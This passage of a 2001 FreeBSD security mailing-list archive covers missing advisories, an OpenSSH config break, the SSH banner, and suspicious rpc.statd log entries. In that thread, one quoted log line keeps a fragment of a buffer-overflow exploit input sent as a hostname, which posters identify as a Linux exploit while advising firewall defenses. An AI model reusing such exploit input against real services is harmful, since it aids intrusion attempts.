From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Andrey Lakhno Cc: Jan Conrad , security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? In-reply-to: Your message of "Thu, 25 Jan 2001 14:10:20 +0200." <20010125141020.A16114@dnepr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 25 Jan 2001 06:17:10 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010125141020.A16114@dnepr.net>, Andrey Lakhno writes: > Hi Jan! > > On Thu, 25 Jan 2001, Jan Conrad wrote: > > > Hi there, > > > > I am subscribed to freebsd-security, freebsd-announce and Bugtraq > > > > On Bugtraq two security announcements appeared: > > > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > > > > Did anybody else observe this?? > > I did. I saw them on BUGTRAQ but not on -security or -announce Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC From owner-freebsd-security Thu Jan 25 6:34:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from dirac.th.physik.uni-bonn.de (dirac.th.physik.uni-bonn.de [131.220.161.119]) by hub.freebsd.org (Postfix) with SMTP id 5748C37B402 for ; Thu, 25 Jan 2001 06:34:39 -0800 (PST) Received: (qmail 70955 invoked from network); 25 Jan 2001 14:34:37 -0000 Received: from merlin.th.physik.uni-bonn.de (131.220.161.121) by dirac.th.physik.uni-bonn.de with SMTP; 25 Jan 2001 14:34:37 -0000 Received: (qmail 98891 invoked by uid 145); 25 Jan 2001 14:34:37 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jan 2001 14:34:37 -0000 Date: Thu, 25 Jan 2001
15:34:37 +0100 (CET) From: Jan Conrad To: Cy Schubert - ITSD Open Systems Group Cc: Andrey Lakhno , security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? In-Reply-To: <200101251417.f0PEHKk14619@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ok - it seems those advisories were not sent to the lists... I sent a message to Kris Kennaway... ciao Jan On Thu, 25 Jan 2001, Cy Schubert - ITSD Open Systems Group wrote: > In message <20010125141020.A16114@dnepr.net>, Andrey Lakhno writes: > > Hi Jan! > > > > On Thu, 25 Jan 2001, Jan Conrad wrote: > > > > > Hi there, > > > > > > I am subscribed to freebsd-security, freebsd-announce and Bugtraq > > > > > > On Bugtraq two security announcements appeared: > > > > > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > > > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > > > > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > > > > > > > Did anybody else observe this?? > > > > I did. > > I saw them on BUGTRAQ but not on -security or -announce > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > -- Physikalisches Institut der Universitaet Bonn Nussallee 12 D-53115 Bonn GERMANY From owner-freebsd-security Thu Jan 25 8:33:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 220CD37B6A7; Thu, 25 Jan 2001 08:32:56 -0800 (PST) Received: from ade by hub.lovett.com with local (Exim 3.20 #1) id 14LpKR-000NcE-00; Thu, 25 Jan 2001 10:32:55 -0600 Date: Thu, 25 Jan 2001 10:32:55 -0600
From: Ade Lovett To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010125103255.A78404@FreeBSD.org> References: <20010124230626.A49802@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010124230626.A49802@citusc17.usc.edu>; from kris@FreeBSD.ORG on Wed, Jan 24, 2001 at 11:06:26PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 24, 2001 at 11:06:26PM -0800, Kris Kennaway wrote: > On Wed, Jan 24, 2001 at 07:09:32PM -0800, Scott Raymond wrote: > > Oh, crap. That's EXACTLY what was happening. > > > > Looks like it's time for another compile. Duh. > > No, it's a configuration directive. Of course, chucking this out: fatal: ConnectionsPerPeriod has been deprecated and then aborting violates POLA. If it's been deprecated, just ignore it for a while, but don't stop functioning because of a "dead" directive. Got bit this morning by that (our ssh/sshd configs are somewhat different from 'normal', and a later experiment with merge didn't remove the offending line, either). Thank heavens for serial consoles. The approach here was not thought through at all, especially with: uxb 22# grep -i connectionsperperiod /usr/src/UPDATING uxb 23# on a fully up-to-date RELENG_4 src/ tree. I would ask, that in -STABLE at least, the fatal error be backed out to a warning, at least for a few months (with sshd ignoring the directive, and continuing to run), and then only move to a fatal error + die. -aDe -- Ade Lovett, Austin, TX.
ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ From owner-freebsd-security Thu Jan 25 8:54:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cx175057-a.ocnsd1.sdca.home.com (cx175057-a.ocnsd1.sdca.home.com [24.13.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 4D28F37B401 for ; Thu, 25 Jan 2001 08:54:11 -0800 (PST) Received: from localhost (bri@localhost) by cx175057-a.ocnsd1.sdca.home.com (8.11.1/8.11.1) with ESMTP id f0PGsU420150 for ; Thu, 25 Jan 2001 08:54:31 -0800 (PST) (envelope-from bri@sonicboom.org) Date: Thu, 25 Jan 2001 08:54:30 -0800 (PST) From: Brian X-Sender: bri@cx175057-a.ocnsd1.sdca.home.com To: freebsd-security@freebsd.org Subject: openssh banner In-Reply-To: <20010125103255.A78404@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am curious how to get rid of the banner ssh presents if you telnet to port 22; currently ssh release info is given, and this is bad. Bri From owner-freebsd-security Thu Jan 25 8:57:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 1BC8537B400 for ; Thu, 25 Jan 2001 08:57:02 -0800 (PST) Received: (from jared@localhost) by puck.nether.net (8.11.1/8.9.3) id f0PGuqm16514; Thu, 25 Jan 2001 11:56:52 -0500 (envelope-from jared) Date: Thu, 25 Jan 2001 11:56:52 -0500
From: Jared Mauch To: Brian Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner Message-ID: <20010125115652.F346@puck.nether.net> References: <20010125103255.A78404@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from bri@sonicboom.org on Thu, Jan 25, 2001 at 08:54:30AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is part of the protocol specification: Read the secsh specification: http://www.ietf.org/internet-drafts/draft-ietf-secsh-connect-08.txt http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-08.txt http://www.ietf.org/internet-drafts/draft-ietf-secsh-userauth-08.txt On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: > > I am curious how to get rid of the banner ssh presents if you telnet to > port 22, currently ssh release info is given, this is bad.. > > Bri -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. END OF LINE | Manager of IP networks built within my own home From owner-freebsd-security Thu Jan 25 9: 2:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from cx175057-a.ocnsd1.sdca.home.com (cx175057-a.ocnsd1.sdca.home.com [24.13.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 1A8A637B401 for ; Thu, 25 Jan 2001 09:02:07 -0800 (PST) Received: from localhost (bri@localhost) by cx175057-a.ocnsd1.sdca.home.com (8.11.1/8.11.1) with ESMTP id f0PH2OO20184; Thu, 25 Jan 2001 09:02:24 -0800 (PST) (envelope-from bri@sonicboom.org) Date: Thu, 25 Jan 2001 09:02:24 -0800 (PST)
From: Brian X-Sender: bri@cx175057-a.ocnsd1.sdca.home.com To: Jared Mauch Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner In-Reply-To: <20010125115652.F346@puck.nether.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Those links, at least the first two, are not valid; there have been updates. http://www.ietf.org/ids.by.wg/secsh.html Brian On Thu, 25 Jan 2001, Jared Mauch wrote: > This is part of the protocol specification: > > > Read the secsh specification: > > http://www.ietf.org/internet-drafts/draft-ietf-secsh-connect-08.txt > http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-08.txt > http://www.ietf.org/internet-drafts/draft-ietf-secsh-userauth-08.txt > > > On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: > > > > I am curious how to get rid of the banner ssh presents if you telnet to > > port 22, currently ssh release info is given, this is bad.. > > > > Bri > > -- > Jared Mauch | pgp key available via finger from jared@puck.nether.net > clue++; | http://puck.nether.net/~jared/ My statements are only mine. > END OF LINE | Manager of IP networks built within my own home From owner-freebsd-security Thu Jan 25 9: 4:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3A38537B402 for ; Thu, 25 Jan 2001 09:03:53 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0PH7KV58681; Thu, 25 Jan 2001 09:07:20 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 09:07:20 -0800
From: Kris Kennaway To: Brian Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh banner Message-ID: <20010125090720.B58537@citusc17.usc.edu> References: <20010125103255.A78404@FreeBSD.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="61jdw2sOBCFtR2d/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from bri@sonicboom.org on Thu, Jan 25, 2001 at 08:54:30AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --61jdw2sOBCFtR2d/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 08:54:30AM -0800, Brian wrote: > > I am curious how to get rid of the banner ssh presents if you telnet to > port 22, currently ssh release info is given, this is bad.. It needs to do this so that the peer knows which version of the protocol to speak to it. This isn't really a problem, IMO. Kris -- NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --61jdw2sOBCFtR2d/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cF1HWry0BWjoQKURAorXAKC5n4nxhpznDcXr39kDEJFqTLIF7gCg+Vpq +NeWDnprxOir1HcxItKua0w= =q2m2 -----END PGP SIGNATURE----- --61jdw2sOBCFtR2d/-- From owner-freebsd-security Thu Jan 25 9: 8:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 2A06437B400 for ; Thu, 25 Jan 2001 09:08:24 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0PHBpo58771; Thu, 25 Jan 2001 09:11:51 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 09:11:51 -0800
From: Kris Kennaway To: Jan Conrad Cc: freebsd-security@FreeBSD.ORG Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: <20010125091151.C58537@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="S1BNGpv0yoYahz37" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from conrad@th.physik.uni-bonn.de on Thu, Jan 25, 2001 at 12:06:57PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --S1BNGpv0yoYahz37 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 12:06:57PM +0100, Jan Conrad wrote: > Hi there, > > I am subscribed to freebsd-security, freebsd-announce and Bugtraq > > On Bugtraq two security announcements appeared: > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > Did anybody else observe this?? There is something wrong with majordomo which is causing it to drop these advisories (I even re-sent them, they still didn't get through). I'll upload them to the FTP site later and post a pointer.
Kris -- NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --S1BNGpv0yoYahz37 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cF5XWry0BWjoQKURArUUAJ46PIY7R5zrxSHP2UhV8LzDgkaVIgCcDxne 75sRIfY71YYLejPSrLM6R9U= =GDR7 -----END PGP SIGNATURE----- --S1BNGpv0yoYahz37-- From owner-freebsd-security Thu Jan 25 9:29:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from troutmask.apl.washington.edu (troutmask.apl.washington.edu [128.208.78.105]) by hub.freebsd.org (Postfix) with ESMTP id 5E61F37B401 for ; Thu, 25 Jan 2001 09:29:01 -0800 (PST) Received: (from kargl@localhost) by troutmask.apl.washington.edu (8.11.1/8.11.1) id f0PHQei65827 for freebsd-security@freebsd.org; Thu, 25 Jan 2001 09:26:40 -0800 (PST) (envelope-from kargl)
From: "Steven G. Kargl" Message-Id: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Subject: buffer overflows in rpc.statd? To: freebsd-security@freebsd.org Date: Thu, 25 Jan 2001 09:26:39 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=ELM980443599-65671-0_ Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ELM980443599-65671-0_ Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Are there any known compromises of rpc.statd that involve buffer overflows? I have several entries in /var/log/messages that look suspicious, but I currently don't know what these entries mean (see attachment). The suspicious entries appear to be buffers that someone or something has tried to overflow. -- Steve http://troutmask.apl.washington.edu/~kargl/ --ELM980443599-65671-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=messages Content-Description: /tmp/messages Content-Transfer-Encoding: quoted-printable
Jan 8 03:35:28 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 8 03:35:28 troutmask /boot/kernel/kernel: [payload elided]
Jan 8 14:40:33 troutmask rpc.statd: Invalid hostname to sm_mon: [payload elided]
Jan 9 14:21:57 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 9 14:21:57 troutmask /boot/kernel/kernel: [payload elided]
Jan 14 20:28:16 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 14 20:28:16 troutmask /boot/kernel/kernel: [payload elided]
Jan 16 19:04:16 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 16 19:04:16 troutmask /boot/kernel/kernel: [payload elided]
Jan 17 20:35:09 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 17 20:35:09 troutmask /boot/kernel/kernel: [payload elided]
Jan 20 21:11:04 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 20 21:11:04 troutmask /boot/kernel/kernel: [payload elided]
Jan 21 16:16:21 troutmask rpc.statd: invalid hostname to sm_stat: [payload elided]
Jan 21 16:16:22 troutmask /boot/kernel/kernel: [payload elided]
--ELM980443599-65671-0_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:31:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id F3A5B37B69F for ; Thu, 25 Jan 2001 09:31:23 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id E8ABE1360C; Thu, 25 Jan 2001 12:31:20 -0500 (EST) Date: Thu, 25 Jan 2001 12:31:20 -0500
From: Chris Faulhaber To: "Steven G. Kargl" Cc: freebsd-security@freebsd.org Subject: Re: buffer overflows in rpc.statd? Message-ID: <20010125123120.A60926@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , "Steven G. Kargl" , freebsd-security@freebsd.org References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu>; from kargl@troutmask.apl.washington.edu on Thu, Jan 25, 2001 at 09:26:39AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 09:26:39AM -0800, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > No, someone is trying to use a Linux rpc.statd exploit on your box, to which the BSDs were never vulnerable (see previous posts on this topic for more info). -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:32: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id BB9EE37B6A0 for ; Thu, 25 Jan 2001 09:31:48 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0PHVlG22248; Thu, 25 Jan 2001 09:31:47 -0800 (PST) Date: Thu, 25 Jan 2001 09:31:47 -0800
From: Alfred Perlstein To: "Steven G. Kargl" Cc: freebsd-security@FreeBSD.ORG Subject: Re: buffer overflows in rpc.statd? Message-ID: <20010125093147.M26076@fw.wintelcom.net> References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu>; from kargl@troutmask.apl.washington.edu on Thu, Jan 25, 2001 at 09:26:39AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Steven G. Kargl [010125 09:29] wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. Kiddies running linux exploits against your box. -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:42: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from gifw.genroco.com (genroco.com [205.254.195.202]) by hub.freebsd.org (Postfix) with ESMTP id 35AAE37B404 for ; Thu, 25 Jan 2001 09:41:33 -0800 (PST) Received: from gi2.genroco.com (IDENT:root@gi2.genroco.com [192.133.120.3]) by gifw.genroco.com (8.9.3/8.9.3) with ESMTP id LAA04301; Thu, 25 Jan 2001 11:41:30 -0600 Received: from scot.genroco.com (scot.genroco.com [192.133.120.125]) by gi2.genroco.com (8.9.3/8.9.3) with SMTP id LAA31473; Thu, 25 Jan 2001 11:41:19 -0600 Message-ID: <024b01c086f6$0cfda480$7d7885c0@genroco.com> 
From: "Scot W. Hetzel" To: "Steven G. Kargl" , References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Subject: Re: buffer overflows in rpc.statd? Date: Thu, 25 Jan 2001 11:41:16 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 
From: "Steven G. Kargl" > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > I've been seeing the same thing on a FreeBSD 4.2-STABLE (Dec 23). Anybody have an idea as to what this is?
Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: [payload elided]
Scot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:46:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from gifw.genroco.com (genroco.com [205.254.195.202]) by hub.freebsd.org (Postfix) with ESMTP id A7E4237B6A0 for ; Thu, 25 Jan 2001 09:46:37 -0800 (PST) Received: from gi2.genroco.com (IDENT:root@gi2.genroco.com
[192.133.120.3]) by gifw.genroco.com (8.9.3/8.9.3) with ESMTP id LAA04366 for ; Thu, 25 Jan 2001 11:46:36 -0600 Received: from scot.genroco.com (scot.genroco.com [192.133.120.125]) by gi2.genroco.com (8.9.3/8.9.3) with SMTP id LAA31504 for ; Thu, 25 Jan 2001 11:46:35 -0600 Message-ID: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> From: "Scot W. Hetzel" To: References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <024b01c086f6$0cfda480$7d7885c0@genroco.com> Subject: Re: buffer overflows in rpc.statd? Date: Thu, 25 Jan 2001 11:46:33 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Scot W. Hetzel" > > Anybody have an idea as to what this is? > > Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: > ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7 > \x Thanks, Chris, for letting us know it's a Linux exploit. Is there any way that we can find the IP address of the script kiddie using this exploit so we can inform their ISP? Thanks, Scot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10: 6:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 2B26537B6A5 for ; Thu, 25 Jan 2001 10:06:14 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id NAA00434; Thu, 25 Jan 2001 13:04:32 -0500 (EST)
From: David La Croix Message-Id: <200101251804.NAA00434@cowpie.acm.vt.edu> Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> from "Scot W. Hetzel" at "Jan 25, 1 11:46:33 am" To: hetzels@westbend.net (Scot W. Hetzel) Date: Thu, 25 Jan 2001 12:04:32 -0600 (CST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I started seeing this kind of activity on my servers beginning around August. I don't specifically log the reports, but looking at the packet refused counters on my IPFW rules, they do continue. I don't know what the consensus is about adding logging of network details about this stuff to rpc.statd, but you can capture logs of any/all network activity you want by adding the "log" directive to a firewall rule. Not sure how much value those logs will be, since there's a significant amount of forged IP headers, source routing, etc., especially among 5kr1pt k1dd135. man ipfw. BTW... not that I know of any specific exploits for Rpc.* family servers, but I would recommend setting up firewall rules to prevent anyone you don't trust from accessing those services (or any other services you might be paranoid about). Even better, make sure your server and clients are behind a firewall that prevents source-routed/forged packets from the outside from spoofing as a part of your LAN.
> From: "Scot W. Hetzel" > > > > Anybody have an idea as to what this is? > > > > Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: > > > ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7 > > \x > > Thanks, Chris, for letting us know it's a Linux exploit. > > Is there any way that we can find the IP address of the script kiddie using > this exploit so we can inform their ISP? > > Thanks, > > Scot > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:10:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from h-209-91-79-2.gen.cadvision.com (h-209-91-79-2.gen.cadvision.com [209.91.79.2]) by hub.freebsd.org (Postfix) with ESMTP id A443237B6A5 for ; Thu, 25 Jan 2001 10:10:38 -0800 (PST) Received: from cirp.org (localhost [127.0.0.1]) by h-209-91-79-2.gen.cadvision.com (8.9.3/8.9.3) with ESMTP id LAA04410 for ; Thu, 25 Jan 2001 11:10:26 -0700 (MST) (envelope-from gtf@cirp.org) Message-Id: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com> Date: Thu, 25 Jan 2001 11:10:25 -0700 (MST)
From: "Geoffrey T. Falk" Subject: rpc.statd bloat To: freebsd-security@freebsd.org In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> MIME-Version: 1.0 Content-Type: TEXT/plain; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a related note: Is it normal for rpc.statd to bloat? rpc.statd on boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000. This box is an NFS server, but I don't think my NFS client (NEXTSTEP 3.2) is using rpc.statd, because it runs just fine without it. Thanks g. On 25 Jan, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:31:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from thegeneral.hiqinternet.com (unknown [216.166.222.134]) by hub.freebsd.org (Postfix) with ESMTP id 6415637B69B for ; Thu, 25 Jan 2001 10:31:38 -0800 (PST) Received: from 9fzaf (laptop [216.166.222.130]) by thegeneral.hiqinternet.com (8.11.1/8.11.1) with SMTP id f0PIVC002881 for ; Thu, 25 Jan 2001 13:31:12 -0500 (EST) (envelope-from aedwards@hiqinternet.com) 
From: "Allen Edwards" To: Subject: Newbie Post - Limiting processes Date: Thu, 25 Jan 2001 13:31:42 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Feel free to flame the newbie if he asks an off topic question (great now I'm talking about myself in the 3rd person). Is there a way to limit a user to a certain number of processes? e.g. one foreground and one background process. I am working on providing some shell accounts to a few clients who have requested it and have heard of persons doing this. Sincerely, Allen Edwards To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:35:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from joe.pythonvideo.com (joe.pythonvideo.com [209.226.29.94]) by hub.freebsd.org (Postfix) with ESMTP id EBB1837B6B6 for ; Thu, 25 Jan 2001 10:35:24 -0800 (PST) Received: from localhost (joe@localhost) by joe.pythonvideo.com (8.11.1/8.11.0) with ESMTP id f0PIYxo05786; Thu, 25 Jan 2001 13:34:59 -0500 (EST) (envelope-from joe@advancewebhosting.com) X-Authentication-Warning: joe.pythonvideo.com: joe owned 